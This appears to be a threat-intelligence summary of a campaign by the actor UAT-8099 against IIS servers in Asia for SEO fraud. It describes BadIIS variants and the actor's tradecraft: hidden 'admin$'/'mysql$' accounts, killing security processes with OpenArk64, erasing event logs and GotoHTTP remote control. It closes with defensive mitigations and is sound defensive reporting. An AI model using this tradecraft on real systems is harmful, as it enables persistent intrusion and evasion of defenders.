Full Report
Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, but with a specific focus on targets in Thailand and Vietnam. The scale of the campaign is currently
Analysis Summary
# Threat Actor: UAT-8099
## Attribution & Identity
**Identification:** China-linked threat actor.
**Known Aliases/Associations:** Shares similarities with the threat cluster responsible for the **WEBJACK** campaign (codenamed by WithSecure).
## Activity Summary
UAT-8099 conducted a campaign targeting vulnerable Internet Information Services (IIS) servers between late 2025 and early 2026. This campaign is a continuation of activity first documented in October 2025. The primary objective appears to be facilitating search engine optimization (SEO) fraud through the deployment of the BadIIS malware family.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploiting security vulnerabilities or weak configurations in IIS server file upload features.
- **Execution:** Use of web shells and PowerShell commands to execute discovery and reconnaissance scripts.
- **Persistence:** Deploying VPN tools (SoftEther VPN), using EasyTier for control, and creating hidden user accounts (initially "admin$", evolving to "mysql$" if the former is blocked) to ensure long-term access.
- **Defense Evasion:** Utilizing red team utilities and legitimate tools to hide activity. Using open-source anti-rootkits like OpenArk64 to terminate security product processes. Employing CnCrypt Protect to hide malicious files.
- **Command and Control (C2):** Leveraging the **GotoHTTP** tool, often launched via a Visual Basic Script downloaded by PowerShell, for remote server control.
- **Discovery:** Executing system information gathering commands.
- **Payload Delivery:** Deploying variants of the **BadIIS** malware, specifically tailored for regional targets.
## Targeting
- **Sectors:** No specific sectors explicitly mentioned, but the focus on IIS server compromise suggests targeting organizations relying on Microsoft web infrastructure.
- **Geography:** Broad initial targeting across Asia, including India, Pakistan, and Japan. **Distinct concentration** observed in **Thailand** and **Vietnam**. Previous documentation (Oct 2025) also noted targeting in Canada and Brazil.
- **Victims:** Victims are defined by their hosting of vulnerable IIS servers. Two region-specific malware variants suggest tailored impact:
- **BadIIS IISHijack:** Targets victims in **Vietnam**.
- **BadIIS asdSearchEngine:** Primarily targets victims in **Thailand** or those with Thai language preferences.
## Tools & Infrastructure
- **Malware Families Used:**
- **BadIIS (Multiple variants):** The primary malware for achieving the SEO fraud objective.
- **GotoHTTP:** Used for remote control/C2 functionality.
- **Utilities/Other Tools:**
- Sharp4RemoveLog (for removing Windows event logs)
- CnCrypt Protect (for file obfuscation)
- OpenArk64 (anti-rootkit tool)
- SoftEther VPN
- EasyTier
- **Infrastructure (C2/Persistence):** Shared C2 infrastructure noted between UAT-8099 and the WEBJACK campaign.
## Implications
UAT-8099 demonstrates operational evolution by integrating legitimate tools and evasion techniques (red team utilities, persistent hidden accounts) to maintain access. Their primary motivation is financial gain through **SEO fraud** (redirecting legitimate search engine crawlers and traffic from users with specific language settings to fraud sites), moving beyond simple initial access to establish sophisticated, long-term persistence mechanisms on compromised web servers. The regional customization of the BadIIS malware indicates a focused effort on maximizing the return of this specific fraud operation in key Asian markets.
## Mitigations
- Patch and secure all Internet Information Services (IIS) servers, paying specific attention to file upload feature vulnerabilities.
- Implement robust monitoring for the creation of unusual user accounts, particularly those named "admin$" or "mysql$".
- Monitor for the execution of PowerShell scripts deploying VBS files or remotely downloading tools like GotoHTTP.
- Review security tooling configurations to detect the use of red team utilities (e.g., OpenArk64) in the environment.
- Implement network segmentation and strict egress filtering to limit the success of C2 communication via tools like GotoHTTP or SoftEther VPN.